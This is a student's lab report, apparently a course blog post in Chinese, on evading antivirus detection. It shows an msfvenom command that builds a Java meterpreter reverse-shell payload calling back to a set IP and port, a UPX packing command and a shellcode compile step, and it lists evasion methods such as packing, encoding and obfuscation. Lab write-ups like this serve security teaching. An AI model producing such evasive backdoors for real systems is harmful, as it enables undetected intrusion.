20171113曾英特《免杀原理与实践》实验报告

实验过程

1使用msf编码器

这里我们使用实验二生成的两个后门exe文件做检测。

 

可以发现,由于实验2中是直接用shellcode代码生成的exe文件,没有做免杀处理,所以基于特征库的检测就能检测出来。

2msfvenom生成如jar之类的其他文件

用命令生成jar文件结果如下图

msfvenom -p java/meterpreter/reverse_tcp LHOST=172.26.1.156 LPORT=9999 W >text.jar 

 

3veil操作

操作步骤与msf类似,输入反弹连接ip与端口生成文件即可。

 

4、加壳工具

使用命令对后门加壳一样是移入共享文件夹时被查杀。

upx backdoor.exe -o upxed.exe

5使用C + shellcode编程

编写C代码

kali中编译最基础的shellcode利用方式还是达不到免杀的效果。

i686-w64-mingw32-g++ shellcode.c  -o shellcode.exe

 

6、使用CHAOS监听工具

CHAOSCHAOS是一款用go语言编写的非常简单实用的后门生成和监听工具。
后门的生成也与msf类似

可以看到我们的后门文件已经成功生成。

 

问题回答

1)杀软是如何检测出恶意代码的?
答:基于特征库检测,对文件代码与特征库进行对比,如果特征库有相似代码,及判为恶意代码。
2)免杀是做什么?
答:免杀就是在不影响恶意代码循行的情况下对代码进行变换等操作,使其能够绕过基于特征库的检测。
3)免杀的基本方法有哪些?
答:加壳,多次编码,对代码进行加密,对代码进行混淆。
开启杀软能绝对防止电脑中恶意代码吗?
答:我记得有句名言是一个程序的漏洞比代码还要多,所以杀软的特征库是有局限于当前的被发现被公开的漏洞及利用技术上,对于一些新型技术与漏洞就无法做出防御。

 

posted @ 2020-04-09 00:09  20171113曾英特  阅读(91)  评论(1编辑  收藏  举报